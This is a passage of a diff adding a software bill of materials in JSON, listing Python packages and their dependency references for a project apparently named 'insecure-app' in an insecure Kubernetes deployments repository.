"pkg:pypi/ruamel.yaml@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ruamel-yaml-conda", + "version": "latest", + "purl": "pkg:pypi/ruamel-yaml-conda@latest", + "type": "library", + "bom-ref": "pkg:pypi/ruamel-yaml-conda@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "s3fs", + "version": "latest", + "purl": "pkg:pypi/s3fs@latest", + "type": "library", + "bom-ref": "pkg:pypi/s3fs@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "safetensors", + "version": "latest", + "purl": "pkg:pypi/safetensors@latest", + "type": "library", + "bom-ref": "pkg:pypi/safetensors@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "scikit-image", + "version": "latest", + "purl": "pkg:pypi/scikit-image@latest", + "type": "framework", + "bom-ref": "pkg:pypi/scikit-image@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "scikit-learn", + "version": "latest", + "purl": "pkg:pypi/scikit-learn@latest", + "type": "framework", + "bom-ref": "pkg:pypi/scikit-learn@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "scikit-learn-intelex", + "version": "20230426.111612", + "purl": "pkg:pypi/scikit-learn-intelex@20230426.111612", + "type": "framework", + "bom-ref": "pkg:pypi/scikit-learn-intelex@20230426.111612", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "scipy", + "version": "latest", + "purl": "pkg:pypi/scipy@latest", + "type": "framework", + "bom-ref": "pkg:pypi/scipy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "seaborn", + "version": "latest", + "purl": "pkg:pypi/seaborn@latest", + "type": "library", + "bom-ref": "pkg:pypi/seaborn@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sip", + "version": "latest", + "purl": "pkg:pypi/sip@latest", + "type": "library", + "bom-ref": "pkg:pypi/sip@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "smart-open", + "version": "latest", + "purl": "pkg:pypi/smart-open@latest", + "type": "library", + "bom-ref": "pkg:pypi/smart-open@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sniffio", + "version": "latest", + "purl": "pkg:pypi/sniffio@latest", + "type": "library", + "bom-ref": "pkg:pypi/sniffio@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sortedcontainers", + "version": "latest", + "purl": "pkg:pypi/sortedcontainers@latest", + "type": "library", + "bom-ref": "pkg:pypi/sortedcontainers@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "soupsieve", + "version": "latest", + "purl": "pkg:pypi/soupsieve@latest", + "type": "library", + "bom-ref": "pkg:pypi/soupsieve@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "spyder", + "version": "latest", + "purl": "pkg:pypi/spyder@latest", + "type": "library", + "bom-ref": "pkg:pypi/spyder@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "spyder-kernels", + "version": "latest", + "purl": "pkg:pypi/spyder-kernels@latest", + "type": "library", + "bom-ref": "pkg:pypi/spyder-kernels@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "stack-data", + "version": "latest", + "purl": "pkg:pypi/stack-data@latest", + "type": "library", + "bom-ref": "pkg:pypi/stack-data@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "statsmodels", + "version": "latest", + "purl": "pkg:pypi/statsmodels@latest", + "type": "library", + "bom-ref": "pkg:pypi/statsmodels@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "sympy", + "version": "latest", + "purl": "pkg:pypi/sympy@latest", + "type": "library", + "bom-ref": "pkg:pypi/sympy@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tables", + "version": "latest", + "purl": "pkg:pypi/tables@latest", + "type": "library", + "bom-ref": "pkg:pypi/tables@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tabulate", + "version": "latest", + "purl": "pkg:pypi/tabulate@latest", + "type": "library", + "bom-ref": "pkg:pypi/tabulate@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tblib", + "version": "latest", + "purl": "pkg:pypi/tblib@latest", + "type": "library", + "bom-ref": "pkg:pypi/tblib@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tenacity", + "version": "latest", + "purl": "pkg:pypi/tenacity@latest", + "type": "library", + "bom-ref": "pkg:pypi/tenacity@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "terminado", + "version": "latest", + "purl": "pkg:pypi/terminado@latest", + "type": "library", + "bom-ref": "pkg:pypi/terminado@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "text-unidecode", + "version": "latest", + "purl": "pkg:pypi/text-unidecode@latest", + "type": "library", + "bom-ref": "pkg:pypi/text-unidecode@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "textdistance", + "version": "latest", + "purl": "pkg:pypi/textdistance@latest", + "type": "library", + "bom-ref": "pkg:pypi/textdistance@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "threadpoolctl", + "version": "latest", + "purl": "pkg:pypi/threadpoolctl@latest", + "type": "library", + "bom-ref": "pkg:pypi/threadpoolctl@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "three-merge", + "version": "latest", + "purl": "pkg:pypi/three-merge@latest", + "type": "library", + "bom-ref": "pkg:pypi/three-merge@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tifffile", + "version": "latest", + "purl": "pkg:pypi/tifffile@latest", + "type": "library", + "bom-ref": "pkg:pypi/tifffile@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tinycss2", + "version": "latest", + "purl": "pkg:pypi/tinycss2@latest", + "type": "library", + "bom-ref": "pkg:pypi/tinycss2@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tokenizers", + "version": "latest", + "purl": "pkg:pypi/tokenizers@latest", + "type": "library", + "bom-ref": "pkg:pypi/tokenizers@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "toml", + "version": "latest", + "purl": "pkg:pypi/toml@latest", + "type": "library", + "bom-ref": "pkg:pypi/toml@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tomlkit", + "version": "latest", + "purl": "pkg:pypi/tomlkit@latest", + "type": "library", + "bom-ref": "pkg:pypi/tomlkit@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "toolz", + "version": "latest", + "purl": "pkg:pypi/toolz@latest", + "type": "library", + "bom-ref": "pkg:pypi/toolz@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tornado", + "version": "latest", + "purl": "pkg:pypi/tornado@latest", + "type": "framework", + "bom-ref": "pkg:pypi/tornado@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tqdm", + "version": "latest", + "purl": "pkg:pypi/tqdm@latest", + "type": "library", + "bom-ref": "pkg:pypi/tqdm@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "traitlets", + "version": "latest", + "purl": "pkg:pypi/traitlets@latest", + "type": "library", + "bom-ref": "pkg:pypi/traitlets@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "transformers", + "version": "latest", + "purl": "pkg:pypi/transformers@latest", + "type": "library", + "bom-ref": "pkg:pypi/transformers@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "typing-extensions", + "version": "latest", + "purl": "pkg:pypi/typing-extensions@latest", + "type": "library", + "bom-ref": "pkg:pypi/typing-extensions@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "tzdata", + "version": "latest", + "purl": "pkg:pypi/tzdata@latest", + "type": "library", + "bom-ref": "pkg:pypi/tzdata@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "uc-micro-py", + "version": "latest", + "purl": "pkg:pypi/uc-micro-py@latest", + "type": "library", + "bom-ref": "pkg:pypi/uc-micro-py@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ujson", + "version": "latest", + "purl": "pkg:pypi/ujson@latest", + "type": "library", + "bom-ref": "pkg:pypi/ujson@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "watchdog", + "version": "latest", + "purl": "pkg:pypi/watchdog@latest", + "type": "library", + "bom-ref": "pkg:pypi/watchdog@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "wcwidth", + "version": "latest", + "purl": "pkg:pypi/wcwidth@latest", + "type": "library", + "bom-ref": "pkg:pypi/wcwidth@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "webencodings", + "version": "0.5.1", + "purl": "pkg:pypi/webencodings@0.5.1", + "type": "library", + "bom-ref": "pkg:pypi/webencodings@0.5.1", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "websocket-client", + "version": "latest", + "purl": "pkg:pypi/websocket-client@latest", + "type": "library", + "bom-ref": "pkg:pypi/websocket-client@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "werkzeug", + "version": "3.0.3", + "purl": "pkg:pypi/werkzeug@3.0.3", + "type": "library", + "bom-ref": "pkg:pypi/werkzeug@3.0.3", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "whatthepatch", + "version": "latest", + "purl": "pkg:pypi/whatthepatch@latest", + "type": "library", + "bom-ref": "pkg:pypi/whatthepatch@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "widgetsnbextension", + "version": "latest", + "purl": "pkg:pypi/widgetsnbextension@latest", + "type": "library", + "bom-ref": "pkg:pypi/widgetsnbextension@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "wurlitzer", + "version": "latest", + "purl": "pkg:pypi/wurlitzer@latest", + "type": "library", + "bom-ref": "pkg:pypi/wurlitzer@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "xarray", + "version": "latest", + "purl": "pkg:pypi/xarray@latest", + "type": "library", + "bom-ref": "pkg:pypi/xarray@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "xxhash", + "version": "latest", + "purl": "pkg:pypi/xxhash@latest", + "type": "library", + "bom-ref": "pkg:pypi/xxhash@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "xyzservices", + "version": "latest", + "purl": "pkg:pypi/xyzservices@latest", + "type": "library", + "bom-ref": "pkg:pypi/xyzservices@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "y-py", + "version": "latest", + "purl": "pkg:pypi/y-py@latest", + "type": "library", + "bom-ref": "pkg:pypi/y-py@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "yapf", + "version": "latest", + "purl": "pkg:pypi/yapf@latest", + "type": "library", + "bom-ref": "pkg:pypi/yapf@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "yarl", + "version": "latest", + "purl": "pkg:pypi/yarl@latest", + "type": "library", + "bom-ref": "pkg:pypi/yarl@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "ypy-websocket", + "version": "latest", + "purl": "pkg:pypi/ypy-websocket@latest", + "type": "library", + "bom-ref": "pkg:pypi/ypy-websocket@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "zict", + "version": "latest", + "purl": "pkg:pypi/zict@latest", + "type": "library", + "bom-ref": "pkg:pypi/zict@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "zipp", + "version": "latest", + "purl": "pkg:pypi/zipp@latest", + "type": "library", + "bom-ref": "pkg:pypi/zipp@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + }, + { + "group": "", + "name": "zstandard", + "version": "latest", + "purl": "pkg:pypi/zstandard@latest", + "type": "library", + "bom-ref": "pkg:pypi/zstandard@latest", + "evidence": { + "identity": { + "field": "purl", + "confidence": 1, + "methods": [ + { + "technique": "instrumentation", + "confidence": 1, + "value": "/home/confusedcrib/git/insecure-kubernetes-deployments/insecure-app/test" + } + ] + } + } + } + ], + "services": [], + "dependencies": [ + { + "ref": "pkg:pypi/insecure-app@latest", + "dependsOn": [ + "pkg:pypi/aiobotocore@latest", + "pkg:pypi/aiofiles@latest", + "pkg:pypi/aiosignal@latest", + "pkg:pypi/aiosqlite@latest", + "pkg:pypi/anaconda-anon-usage@latest", + "pkg:pypi/anaconda-catalogs@latest", + "pkg:pypi/anaconda-cloud-auth@latest", + "pkg:pypi/anaconda-navigator@latest", + "pkg:pypi/anaconda-project@latest", + "pkg:pypi/anyio@latest", + "pkg:pypi/appdirs@1.4.4", + "pkg:pypi/argon2-cffi-bindings@latest", + "pkg:pypi/argon2-cffi@latest", + "pkg:pypi/arrow@latest", + "pkg:pypi/astroid@latest", + "pkg:pypi/astropy@latest", + "pkg:pypi/asttokens@latest", + "pkg:pypi/async-timeout@latest", + "pkg:pypi/atomicwrites@1.4.0", + "pkg:pypi/autopep8@latest", + "pkg:pypi/backcall@latest", + "pkg:pypi/backports.functools-lru-cache@latest", + "pkg:pypi/backports.tempfile@latest", + "pkg:pypi/backports.weakref@1.0.post1", + "pkg:pypi/bcrypt@latest", + "pkg:pypi/beautifulsoup4@latest", + "pkg:pypi/binaryornot@latest", + "pkg:pypi/black@latest", + "pkg:pypi/bleach@latest", + "pkg:pypi/blinker@1.8.2", + "pkg:pypi/bokeh@latest", + "pkg:pypi/boltons@latest", + "pkg:pypi/bottleneck@latest", + "pkg:pypi/brotlipy@0.7.0", + "pkg:pypi/certifi@latest", + "pkg:pypi/cffi@latest", + "pkg:pypi/chardet@3.0.4", + "pkg:pypi/charset-normalizer@latest", + "pkg:pypi/click@8.1.7", + "pkg:pypi/cloudpickle@latest", + "pkg:pypi/colorama@latest", + "pkg:pypi/colorcet@latest", + "pkg:pypi/comm@latest", + "pkg:pypi/conda-build@latest", + "pkg:pypi/conda-content-trust@latest", + "pkg:pypi/conda-index@latest", + "pkg:pypi/conda-libmamba-solver@latest", + "pkg:pypi/conda-package-streaming@latest", + "pkg:pypi/conda-repo-cli@1.0.75", + "pkg:pypi/conda-token@latest", + "pkg:pypi/conda-verify@3.4.2", + "pkg:pypi/contourpy@latest", + "pkg:pypi/cookiecutter@latest", + "pkg:pypi/cycler@latest", + "pkg:pypi/cytoolz@latest", + "pkg:pypi/daal4py@2023.1.1", + "pkg:pypi/dask@latest", + "pkg:pypi/datasets@latest", + "pkg:pypi/datashader@latest", + "pkg:pypi/datashape@0.5.4", + "pkg:pypi/debugpy@latest", + "pkg:pypi/decorator@latest", + "pkg:pypi/diff-match-patch@latest", + "pkg:pypi/dill@latest", + "pkg:pypi/distributed@latest", + "pkg:pypi/docstring-to-markdown@latest", + "pkg:pypi/entrypoints@latest", + "pkg:pypi/et-xmlfile@1.1.0", + "pkg:pypi/executing@latest", + "pkg:pypi/fastjsonschema@latest", + "pkg:pypi/filelock@latest", + "pkg:pypi/flake8@latest", + "pkg:pypi/flask@3.0.2", + "pkg:pypi/fonttools@4.25.0", + "pkg:pypi/fsspec@latest", + "pkg:pypi/future@latest", + "pkg:pypi/gensim@latest", + "pkg:pypi/glob2@latest", + "pkg:pypi/gmpy2@latest", + "pkg:pypi/h5py@latest", + "pkg:pypi/heapdict@latest", + "pkg:pypi/holoviews@latest", + "pkg:pypi/huggingface-hub@latest", + "pkg:pypi/hvplot@latest", + "pkg:pypi/idna@2.7", + "pkg:pypi/imagecodecs@latest", + "pkg:pypi/imageio@latest", + "pkg:pypi/imbalanced-learn@latest", + "pkg:pypi/importlib-metadata@latest", + "pkg:pypi/inflection@0.5.1", + "pkg:pypi/iniconfig@latest", + "pkg:pypi/intervaltree@latest", + "pkg:pypi/ipykernel@latest", + "pkg:pypi/ipython-genutils@latest", + "pkg:pypi/ipython@latest", + "pkg:pypi/ipywidgets@latest", + "pkg:pypi/isort@latest", + "pkg:pypi/itsdangerous@2.2.0", + "pkg:pypi/jaraco.classes@latest", + "pkg:pypi/jedi@latest", + "pkg:pypi/jellyfish@latest", + "pkg:pypi/jinja2-time@latest", + "pkg:pypi/jmespath@latest", + "pkg:pypi/joblib@latest", + "pkg:pypi/json5@latest", + "pkg:pypi/jsonpatch@latest", + "pkg:pypi/jsonpointer@2.1", + "pkg:pypi/jsonschema@latest", + "pkg:pypi/jupyter-client@latest", + "pkg:pypi/jupyter-console@latest", + "pkg:pypi/jupyter-core@latest", + "pkg:pypi/jupyter-events@latest", + "pkg:pypi/jupyter-server-fileid@latest", + "pkg:pypi/jupyter-server-ydoc@latest", + "pkg:pypi/jupyter-server@latest", + "pkg:pypi/jupyter-ydoc@latest", + "pkg:pypi/jupyter@latest", + "pkg:pypi/jupyterlab-pygments@latest", + "pkg:pypi/jupyterlab-server@latest", + "pkg:pypi/jupyterlab-widgets@latest", + "pkg:pypi/jupyterlab@latest", + "pkg:pypi/kaleido@latest", + "pkg:pypi/kiwisolver@latest", + "pkg:pypi/lazy-loader@latest", + "pkg:pypi/lazy-object-proxy@latest", + "pkg:pypi/libarchive-c@latest", + "pkg:pypi/libmambapy@latest", + "pkg:pypi/linkify-it-py@latest", + "pkg:pypi/llvmlite@latest", + "pkg:pypi/lmdb@latest", + "pkg:pypi/locket@latest", + "pkg:pypi/lz4@latest", + "pkg:pypi/markdown-it-py@latest", + "pkg:pypi/markdown@latest", + "pkg:pypi/matplotlib-inline@latest", + "pkg:pypi/matplotlib@latest", + "pkg:pypi/mccabe@latest", + "pkg:pypi/mdit-py-plugins@latest", + "pkg:pypi/mdurl@latest", + "pkg:pypi/mistune@latest", + "pkg:pypi/mkl-fft@latest", + "pkg:pypi/mkl-random@latest", + "pkg:pypi/mkl-service@2.4.0", + "pkg:pypi/more-itertools@latest", + "pkg:pypi/mpmath@latest", + "pkg:pypi/msgpack@latest", + "pkg:pypi/multidict@latest", + "pkg:pypi/multipledispatch@latest", + "pkg:pypi/multiprocess@latest", + "pkg:pypi/munkres@1.1.4", + "pkg:pypi/mypy-extensions@latest", + "pkg:pypi/navigator-updater@latest", + "pkg:pypi/nbclassic@latest", + "pkg:pypi/nbclient@latest", + "pkg:pypi/nbconvert@latest", + "pkg:pypi/nest-asyncio@latest", + "pkg:pypi/networkx@latest", + "pkg:pypi/nltk@latest", + "pkg:pypi/notebook-shim@latest", + "pkg:pypi/notebook@latest", + "pkg:pypi/numba@latest", + "pkg:pypi/numexpr@latest", + "pkg:pypi/numpydoc@latest", + "pkg:pypi/openpyxl@3.0.10", + "pkg:pypi/pandas@latest", + "pkg:pypi/pandocfilters@latest", + "pkg:pypi/panel@latest", + "pkg:pypi/param@latest", + "pkg:pypi/parso@latest", + "pkg:pypi/partd@latest", + "pkg:pypi/pathlib@latest", + "pkg:pypi/pathspec@latest", + "pkg:pypi/patsy@0.5.3", + "pkg:pypi/pep8@1.7.1", + "pkg:pypi/pexpect@latest", + "pkg:pypi/pickleshare@latest", + "pkg:pypi/pillow@latest", + 